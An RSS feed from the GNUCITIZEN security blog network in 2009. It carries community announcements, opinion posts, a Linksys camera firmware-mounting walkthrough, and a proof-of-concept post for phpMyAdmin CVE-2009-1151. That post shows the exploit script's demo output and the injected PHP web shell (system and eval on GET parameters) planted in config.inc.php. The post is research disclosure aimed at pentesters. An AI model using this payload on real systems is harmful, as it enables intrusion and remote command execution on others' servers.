<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:yt="http://gdata.youtube.com/schemas/2007" version="2.0">
   <channel>
      <title>GNUCITIZEN Network</title>
      <description>GNUCITIZEN Network</description>
      <link>http://pipes.yahoo.com/pipes/pipe.info?_id=Sn4Ffa3x3BGCYK7_nkartA</link>
      <pubDate>Fri, 10 Jul 2009 02:12:57 -0700</pubDate>
      <generator>http://pipes.yahoo.com/pipes/</generator>
      <image><link>http://www.gnucitizen.org</link><url>http://www.gnucitizen.org/images/gc-reflection-gnucitizen-inverted.png</url><title>GNUCITIZEN</title></image><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com" /><item>
         <title>Websecurify Security Scanner v0.1 Sneak Peek</title>
         <link>http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html</link>
         <description>&lt;a rel="nofollow" target="_blank" href="http://1.bp.blogspot.com/_9TXLRd-gO5c/Skz1y0Yj9WI/AAAAAAAAAKY/PtvvVZtugpU/s1600-h/websecurify-tool-20090702.png"&gt;&lt;img style="cursor:pointer;cursor:hand;width:320px;height:254px;" src="http://1.bp.blogspot.com/_9TXLRd-gO5c/Skz1y0Yj9WI/AAAAAAAAAKY/PtvvVZtugpU/s320/websecurify-tool-20090702.png" border="0" alt="" id="BLOGGER_PHOTO_ID_5353924310440605026"/&gt;&lt;/a&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;i&gt;No comments! It should be ready soon!&lt;/i&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2382932154546319997-1926265366614249880?l=blog.websecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (pdp)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-2382932154546319997.post-1926265366614249880</guid>
         <pubDate>Thu, 02 Jul 2009 11:00:00 -0700</pubDate>
         <media:thumbnail width="72" url="http://1.bp.blogspot.com/_9TXLRd-gO5c/Skz1y0Yj9WI/AAAAAAAAAKY/PtvvVZtugpU/s72-c/websecurify-tool-20090702.png" height="72" />
      </item>
      <item>
         <title>CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/</link>
         <description>I couldn&amp;#8217;t find any public PoC/exploit for this phpMyAdmin vulnerability, despite it being a serious bug affecting a popular open-source project. I think this vulnerability is a nice reminder that it&amp;#8217;s still possible to perform remote command execution these days without relying on SQL injection (i.e.: xp_cmdshell) or a memory corruption bug (i.e.: heap overflow). All the documentation you need is in the script comments. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=3254</guid>
         <pubDate>Tue, 09 Jun 2009 12:03:13 -0700</pubDate>
         <content:encoded><![CDATA[<p>I couldn&#8217;t find any public PoC/exploit for this <a rel="nofollow" target="_blank" href="http://www.phpmyadmin.net/home_page/index.php">phpMyAdmin</a> vulnerability, despite it being a serious bug affecting a popular open-source project.</p> <p>I think this vulnerability is a nice reminder that it&#8217;s still possible to perform remote command execution these days without relying on SQL injection (i.e.: xp_cmdshell) or a memory corruption bug (i.e.: heap overflow).</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/photographi_esc_/2853937161/"><img src="http://farm4.static.flickr.com/3287/2853937161_ec3decc214.jpg?v=0" title="Broken"/></a></div> <p>All the documentation you need is in the script comments. I recommend you to go through it, before you actually run the script.</p> <p>After reading the public <a rel="nofollow" target="_blank" href="http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php">advisory</a> and patched code, and playing around for a while, I managed to have a working PoC bash script. The script will allow you to remotely run shell commands and PHP code against vulnerable targets. Although in principle the vulnerability sounds quite simple, it actually took me a while to go from <a rel="nofollow" target="_blank" href="http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php">advisory</a> to working attack code.</p> <p><em>I&#8217;m providing the script with the hope that it will help pentesters and security researchers. Please only test the script against your own systems, or systems you have been given permission to pentest! Don&#8217;t be evil, it&#8217;s not worth it.</em></p> <h3>Demo</h3> <pre><code>$ ./phpMyAdminRCE.sh
usage: ./phpMyAdminRCE.sh 
i.e.: ./phpMyAdminRCE.sh http://target.tld/phpMyAdmin/ $ ./phpMyAdminRCE.sh http://172.16.211.10/phpMyAdmin-3.0.1.1/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/phpMyAdminRCE.sh.9217.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.: http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/ http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?p=phpinfo(); please send any feedback/improvements for this script to unknown.pentester gmail.com $ curl "http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/"
total 96
drwxr-xr-x 2 root root 4096 Mar 11 10:12 bin
drwxr-xr-x 3 root root 4096 May 6 10:01 boot
lrwxrwxrwx 1 root root 11 Oct 12 2008 cdrom -&gt; media/cdrom
drwxr-xr-x 15 root root 14300 Jun 5 09:02 dev
drwxr-xr-x 147 root root 12288 Jun 5 09:02 etc
drwxr-xr-x 3 root root 4096 Oct 18 2008 home
drwxr-xr-x 2 root root 4096 Jul 2 2008 initrd
<em>[partial output removed for brevity reasons]</em></code></pre> <p>Contents of <code>/config/config.inc.php</code> after our evil code has been successfully injected (injected code shown in <strong>bold</strong>):</p> <pre><code>&lt;?php
/* * Generated configuration file * Generated by: phpMyAdmin 3.0.1.1 setup script by Michal Čihař &lt;michal@cihar.com&gt; * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $ * Date: Tue, 09 Jun 2009 14:13:34 GMT */ /* Servers configuration */
$i = 0; /* Server (config:root) [1] */
$i++;
$cfg[&apos;Servers&apos;][$i][&apos;host&apos;]=&apos;<strong>&apos;; if($_GET[&apos;c&apos;]){echo
&apos;&lt;pre&gt;&apos;;system($_GET[&apos;c&apos;]);echo &apos;&lt;/pre&gt;&apos;;}if($_GET[&apos;p&apos;]){echo
&apos;&lt;pre&gt;&apos;;eval($_GET[&apos;p&apos;]);echo &apos;&lt;/pre&gt;&apos;;};//</strong>&apos;] = &apos;localhost&apos;;
$cfg[&apos;Servers&apos;][$i][&apos;extension&apos;] = &apos;mysqli&apos;;
$cfg[&apos;Servers&apos;][$i][&apos;connect_type&apos;] = &apos;tcp&apos;;
$cfg[&apos;Servers&apos;][$i][&apos;compress&apos;] = false;
$cfg[&apos;Servers&apos;][$i][&apos;auth_type&apos;] = &apos;config&apos;;
$cfg[&apos;Servers&apos;][$i][&apos;user&apos;] = &apos;root&apos;; /* End of servers configuration */ ?&gt;</code></pre> <h3>Thanks</h3> <p><em>I&#8217;d like to thank <a rel="nofollow" target="_blank" href="http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/">Greg Ose</a> for discovering such a cool vuln and doing a nice writeup about the technical details! Also big thanks to <a rel="nofollow" target="_blank" href="http://www.milw0rm.com/">str0ke</a> for testing this PoC script and providing such useful feedback!</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/MbrBV_cxDIg" height="1" width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>Next Stage</title>
         <link>http://houseofhackers.org/2009/06/06/next-stage/</link>
         <description>We are moving forward slowly but surely. There is no need to rush though! In this post I just want to make several announcements and also mention a few important things. Before you login for the first time in the network you need to reset your account.
The main HoH blog, the one this post is published [...]</description>
         <guid isPermaLink="false">http://houseofhackers.org/?p=38</guid>
         <pubDate>Sat, 06 Jun 2009 02:09:09 -0700</pubDate>
         <content:encoded><![CDATA[<p>We are moving forward slowly but surely. There is no need to rush though! In this post I just want to make several announcements and also mention a few important things.</p>
<ol>
<li>Before you login for the first time in the network you need to reset your account.</li>
<li>The main HoH blog, the one this post is published on, is open for your contributions. If you want to post stuff please do let me know.</li>
<li>I was thinking to start a blog on HoH for random ideas for early feedback. I&#8217;ve been working on some stuff lately but they are not anywhere finished so a blog of that sort will give you the opportunity to share your work and get early feedback without the need to worry about the completeness of your work.</li>
<li>There were some ideas regarding setting up jabber and perhaps an asterix server. I think that these are great ideas and we should definitely do that. However, we need to make sure that we&#8217;ve got good policies in place and we harden the boxes before we proceed as the services are most likely going to be attacked once we open the doors.</li>
<li>Documents - there were suggestions on aggregating important documents or document templates that help when performing pentesting work, etc. This is a great idea. The question is how we are going to do that. The first idea is to start a blog and attach the documents per post. The second idea is to host the documents on a separate HoH domain, for example documents.houseofhackers.org or something similar. It is your call. Let&#8217;s discuss.</li>
</ol>
<p>I think that HoH can turn into pretty cool place but we need to make it happen via small contributions from everybody. Let me know how do you feel about the points above.</p>]]></content:encoded>
      </item>
      <item>
         <title>Hacking Linksys IP Cameras (pt 5)</title>
         <link>http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/</link>
         <description>This article is a continuation of the following GNUCITIZEN articles: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3), Hacking Linksys IP Cameras (pt 4). Mounting the filesystem on your workstation There are many ways to mount the camera&amp;#8217;s filesystem using the firmware binary. In this post, we&amp;#8217;ll explain one way to mount firmware version v1.00R24 which is the latest available for the WVC54GCA model. [...]</description>
         <guid isPermaLink="false">https://www.gnucitizen.org/?p=3229</guid>
         <pubDate>Fri, 05 Jun 2009 01:04:55 -0700</pubDate>
         <content:encoded><![CDATA[<p><em>This article is a continuation of the following GNUCITIZEN articles: <q><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-1/">Hacking Linksys IP Cameras (pt 1)</a></q>, <q><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-2/">Hacking Linksys IP Cameras (pt 2)</a></q>, <q><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/">Hacking Linksys IP Cameras (pt 3)</a></q>, <q><a rel="nofollow" target="_blank" href="http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/">Hacking Linksys IP Cameras (pt 4)</a></q>.</em></p> <h3>Mounting the filesystem on your workstation</h3> <p>There are many ways to mount the camera&#8217;s filesystem using the firmware binary. In this post, we&#8217;ll explain one way to mount firmware version v1.00R24 which is the latest available for the WVC54GCA model.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/cbs_fan/1029630568/"><img src="http://farm2.static.flickr.com/1266/1029630568_a24b2a71e3.jpg?v=0" title="Triple Cam brighted"/></a></div> <p>If you were to only use the firmware binary, things could be a bit difficult, as you don&#8217;t know the format of the binary at all. However, having the GPL firmware helps a lot as we&#8217;ll see next. I emailed Linksys back on Apr 23, 2009 informing them that although the GPL firmware was available on their site for other Linksys products, they hadn&#8217;t uploaded the one for the WVC54GCA camera. A few days later, on Apr 27, 2009, Linksys kindly made it available and <a rel="nofollow" target="_blank" href="http://www.linksysbycisco.com/US/en/supportgplcode">has been available</a> ever since (the file to download is wvc54gca_v1.00R24.tgz).</p> <p>Thanks to <a rel="nofollow" target="_blank" href="http://brooknet.no-ip.com/~lex/">Lex Landa</a>&#8217;s tips I was able to figure out the parameters required to mount the firmware binary, by analysing the data contained in the <code>./scripts/wvc54gc_usa_english/combine.cfg</code> file which is included with the <a rel="nofollow" target="_blank" href="http://downloads.linksysbycisco.com/downloads/wvc54gca_v1.00R24,5.tgz">GPL firmware</a>:</p> <pre><code>size = 00400000
file = WVC54GCA.bin
f1_name = loader
f1_start = 00000000
f2_name=loader.ver
f2_start=00007FFE
f3_name=<strong>kernel</strong>
f3_start=<strong>00020000</strong>
f4_name=<strong>filesystem</strong>
f4_start=<strong>000E0000</strong>
f5_name=PID
f5_start=003FFFB2</code></pre> <p>I simply focused on the <code>kernel</code> and <code>filesystem</code> parameters. The previous settings show that then kernel starts at 0&#215;20000 (131072 bytes / 128 KB), and the filesystem starts at 0xE0000 (917504 bytes / 896 KB). In order to start <a rel="nofollow" target="_blank" href="http://en.wikipedia.org/wiki/Dd_(Unix)">dd</a> reading at 0xE0000, we need to keep 7 chunks of 131072 bytes. i.e.:<code>7*131072=917504 bytes=0xE0000</code> (the position we want)</p> <pre><code>$ dd if=DYFF08-402-1024.bin bs=<strong>131072</strong> of=fs.img skip=<strong>7</strong>
25+0 records in
25+0 records out
3276800 bytes (3.3 MB) copied, 0.019424 s, 169 MB/s</code></pre> <p>We then verify that our image file is a valid <code>squashfs</code> filesystem:</p> <pre><code>$ file fs.img fs.img:<strong> Squashfs</strong> filesystem, little endian, version 3.0, 2216311 bytes, 475 inodes, blocksize: 65536 bytes, created: Fri Nov 9 03:58:52 2007</code></pre> <p>A finally mount it on our hardrive:</p> <pre><code>$ sudo mkdir /mnt/test
$ sudo mount -t <strong>squashfs</strong> fs.img /mnt/test -o ro,loop
$ ls /mnt/test/
bin dev etc lib mnt proc root sbin tmp usr var</code></pre><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p><img src="http://feeds.feedburner.com/~r/gnucitizen/~4/i5HZCjdXt3I" height="1" width="1"/>]]></content:encoded>
      </item>
      <item>
         <title>Simple and Obvious</title>
         <link>http://www.hakiri.org/blog/simple-and-obvious/</link>
         <description>When we see something that is simple and obvious we automatically assume that we can reach the same idea because after all it is simple and obvious. However, simple and obvious concepts are hard to come up with. Do not ignore the simple and the obvious. [...]</description>
         <guid isPermaLink="false">https://www.hakiri.org/?p=614</guid>
         <pubDate>Wed, 03 Jun 2009 08:23:15 -0700</pubDate>
         <content:encoded><![CDATA[<p>When we see something that is simple and obvious we automatically assume that we can reach the same idea because after all it is simple and obvious. However, simple and obvious concepts are hard to come up with.</p> <div class="screen"><a rel="nofollow" target="_blank" href="http://www.flickr.com/photos/countrushmore/1453232544/"><img src="http://farm2.static.flickr.com/1214/1453232544_3b37471172.jpg?v=0" alt="LIVE - EVIL"/></a></div> <p><em>Do not ignore the simple and the obvious. Some of the greatest things ever invented are quite simple and rather obvious but nevertheless great and irreplaceable.</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>Microsoft Motion Control – The Future is Now</title>
         <link>http://www.hakiri.org/blog/microsoft-motion-control-the-future-is-now/</link>
         <description>The following is a conceptional video from Microsoft regarding their motion control system for XBox. It is a conceptional video but there are some developments towards this future today. [...]</description>
         <guid isPermaLink="false">https://www.hakiri.org/?p=609</guid>
         <pubDate>Wed, 03 Jun 2009 07:37:41 -0700</pubDate>
         <content:encoded><![CDATA[<p>The following is a conceptional video from Microsoft regarding their motion control system for XBox.</p> <div class="screen"><iframe class="embeddedvideo" src="http://www.viddler.com/simple_on_site/44771808" width="437" height="265" type="application/x-shockwave-flash" name="viddler"></iframe></div> <p><em>It is a conceptional video but there are some developments towards this future today. Tomorrow I will post a more realistic video, which shows the motion control in action.</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>Micro Communities</title>
         <link>http://www.hakiri.org/blog/micro-communities/</link>
         <description>I think that we are at the verge of another online change. We are going from hyper global communities, to ultra local and even micro communities. Global communities are places such as Facebook, Twitter, MySpace and all other social networks which sole purpose is to get as many users on board as possible. They are doing well but have become significantly less helpful in the last couple of years. In other words, people find them too intrusive, to globalized and subjective to abuse. [...]</description>
         <guid isPermaLink="false">https://www.hakiri.org/?p=607</guid>
         <pubDate>Thu, 28 May 2009 07:05:14 -0700</pubDate>
         <content:encoded><![CDATA[<p>I think that we are at the verge of another online change. We are going from hyper global communities, to ultra local and even micro communities.</p> <p>Global communities are places such as Facebook, Twitter, MySpace and all other social networks which sole purpose is to get as many users on board as possible. They are doing well but have become significantly less helpful in the last couple of years. In other words, people find them too intrusive, to globalized and subjective to abuse. People add friends as maniacs for no apparent reason apart form increasing their rank and apparently popularity level &#8211; a number which often means nothing to anyone.</p> <p>As a result of all of this, we see the emergency of hyper local communities where real relationships can be made; micro communities designed around very specific purposes with clearly defined goals. These communities matter as they are real. They are small but sometimes quite significant and influential.</p> <p>Needless to say, hyper local and micro communities are more secure and less subjective to abuse. Simply put, when people know each other quite well a lot of technological and social related problems such as spam, fake identities, etc., become non-issues. They simple disappear. This is an interesting side-effect which worths further exploration.</p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" href="http://houseofhackers.org/2009/06/06/next-stage/">Next Stage</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/i5HZCjdXt3I/">Hacking Linksys IP Cameras (pt 5)</a><br/><a rel="nofollow" target="_blank" href="http://www.hakiri.org/blog/simple-and-obvious/">Simple and Obvious</a><br/></p>]]></content:encoded>
      </item>
      <item>
         <title>Building the Community from Scratch</title>
         <link>http://houseofhackers.org/2009/05/28/building-the-community-from-scratch/</link>
         <description>We are building the community pretty much from scratch: slowly but surely. There are some great ideas currently being generate and I hope we can make them happen soon.
Here is a list of a few ideas that I personally would like to see happen around HoH: Video blog - list of public domain videos on security, [...]</description>
         <guid isPermaLink="false">http://houseofhackers.org/?p=27</guid>
         <pubDate>Thu, 28 May 2009 06:40:23 -0700</pubDate>
         <content:encoded><![CDATA[<p>We are building the community pretty much from scratch: slowly but surely. There are some great ideas currently being generate and I hope we can make them happen soon.</p>
<p>Here is a list of a few ideas that I personally would like to see happen around HoH:</p>
<ol>
<li>Video blog - list of public domain videos on security, etc; could turn into a dedicate vlog in the future</li>
<li>Podcasts - there was a lot of interest in dedicate HoH podcast. I am not in particular very good at this so everyone who is willing to help, please let us know.</li>
<li>Professional Materials - we really want to keep this network as clean and professional as possible. This means, that we are going to have specialized sections for training, pentesting and more, dedicated to infosec professionals.</li>
</ol>
<p>So what do you say? Can we do it?</p>]]></content:encoded>
      </item>
      <item>
         <title>Information Gathering at its Greatest!</title>
         <link>http://blog.blogsecurify.com/2009/05/information-gathering-at-its-greatest.html</link>
         <description>There is a tool I've found recently that is purely genius and very innovative. It is called Maltego and is a information gathering tool that uses backends and social sites like facebook, twitter, blog post and more to gather information based on the information you give it and what searches you preform. The tool will bring back a graph based search results pulling up everything it could find on the subject whether it be name, domain, email, dns servers, linked sites and much, much more! This tool is a must have for enumeration and the great part is the community edition is free! Download the community edition &lt;a rel="nofollow" target="_blank" href="http://www.paterva.com/maltego/community-edition/"&gt;here&lt;/a&gt;. If you need some help getting started you can view the video tutorials &lt;a rel="nofollow" target="_blank" href="http://www.paterva.com/maltego/screenshots/"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;- &lt;i&gt;"Information is power. Information is Maltego."&lt;/i&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/443511708867239838-3607914312507190865?l=blog.blogsecurify.com'/&gt;&lt;/div&gt;</description>
         <author>noreply@blogger.com (t3hmadhatt3r)</author>
         <guid isPermaLink="false">tag:blogger.com,1999:blog-443511708867239838.post-3607914312507190865</guid>
         <pubDate>Tue, 19 May 2009 16:33:00 -0700</pubDate>
      </item>
      <item>
         <title>HoH Developers Group</title>
         <link>http://houseofhackers.org/2009/05/14/hoh-developers-group/</link>
         <description>This is just a quick announcement to let you know that we&amp;#8217;ve started a group dedicated to people with a development background. The idea behind the group is not only to facilitate better communication between like-minded people but also to allow people with ideas to look for development talent to be used in projects.
Like everything in HoH, [...]</description>
         <guid isPermaLink="false">http://houseofhackers.org/?p=11</guid>
         <pubDate>Thu, 14 May 2009 14:42:37 -0700</pubDate>
         <content:encoded><![CDATA[<p>This is just a quick announcement to let you know that we&#8217;ve started a <a rel="nofollow">group</a> dedicated to people with a development background. The idea behind the group is not only to facilitate better communication between like-minded people but also to allow people with ideas to look for development talent to be used in projects.</p>
<p>Like everything in HoH, this is a community effort, i.e. a social experiment. If you want to become member of the new HoH initiative, please let us know via our <a rel="nofollow">contact page</a>.</p>]]></content:encoded>
      </item>
      <item>
         <title>World of Warcraft and Social Media Success</title>
         <link>http://www.hakiri.org/blog/world-of-warcraft-and-social-media-success/</link>
         <description>Mashable is running an interesting article today titled 6 Things World of Warcraft Can Teach You About Social Media Success. It is about the life lessons the author of the article learned while playing WoW. I took the courtesy to summarize them all here but pay a tribute to mashable by visiting their website first. The Lessons Success requires constant dedication &amp;#8211; To succeed, you need to put in time and dedication. [...]</description>
         <guid isPermaLink="false">https://www.hakiri.org/?p=591</guid>
         <pubDate>Mon, 11 May 2009 11:54:22 -0700</pubDate>
         <content:encoded><![CDATA[<p>Mashable is running an interesting article today titled <q><a rel="nofollow" target="_blank" href="http://mashable.com/2009/05/11/world-of-warcraft-social-media/">6 Things World of Warcraft Can Teach You About Social Media Success</a></q>. It is about the life lessons the author of the article learned while playing WoW.</p> <p>I took the courtesy to summarize them all here but pay a tribute to mashable by visiting their website first.</p> <h3>The Lessons</h3> <ol>
<li><strong>Success requires constant dedication</strong> &#8211; To succeed, you need to put in time and dedication.</li>
<li><strong>It&#8217;s important to strategize your communication</strong> &#8211; If you don’t communicate effectively and clearly who you are and what you want no one will listen.</li>
<li><strong>Set an objective and develop a strategy</strong> &#8211; Do not attempt to utilize social media without any specific objective or idea on how to be successful. You will fade away because you didn’t try to participate actively in the community or just didn’t know how.</li>
<li><strong>It’s about networking</strong> &#8211; The people you connect with are incredibly important. It can mean the difference between success and failure.</li>
<li><strong>Join new services, create new lines of communication</strong> &#8211; You should always be looking to create new lines of communication and new people to interact with. Rely on these people to educate and enlighten you. Expand your horizons by trying out new things in social media.</li>
<li><strong>Earn other people’s trust</strong> &#8211; People won’t trust you until you can show them that you are to be trusted. Enough charlatans exist that you have to prove your value first before earning respect.</li>
</ol> <p>All of this reminds me of something I wanted to do for long, long time. Let me explain. In my high school years me and my friends used to organize late evening StarCraft tournaments &#8211; nothing too obsessive, two games max per day and no more than 1-2 hours long. We used to do these tournaments for a couple of months and it was then when I noticed similarities between the strategies involved in the game and the things that we do in real life. I very rarely play strategy games these days but I&#8217;ve always wanted to summarize in a blog post or something my conclusions from my experience when I used to play.</p> <p><em>I guess now I have an incentive to finally sit and do it.</em></p><p>---<br/>gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/gigs">information security gigs</a> part of the <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net">cutting-edge network</a>:</p><ul><li><a rel="nofollow" target="_blank" href="http://www.adsosimple.com/">No active items found!</a></li><li><a rel="nofollow" target="_blank" href="http://spreadsheets.google.com/viewform?formkey=cFFqa3VVa0FRWFdwN2hzMHVvaldaWWc6MA..">GNUCITIZEN Content Survey</a></li></ul><p>---<br/>recent posts from the gnucitizen <a rel="nofollow" target="_blank" href="http://www.gnucitizen.net/">cutting-edge network</a>:</p><p><a rel="nofollow" target="_blank" href="http://blog.websecurify.com/2009/07/websecurify-security-scanner-v01-sneak.html">Websecurify Security Scanner v0.1 Sneak Peek</a><br/><a rel="nofollow" target="_blank" href="http://feedproxy.google.com/~r/gnucitizen/~3/MbrBV_cxDIg/">CVE-2009-1151: phpMyAdmin Remote Code Execution Proof of Concept</a><br/><a rel="nofollow" target="_blank" 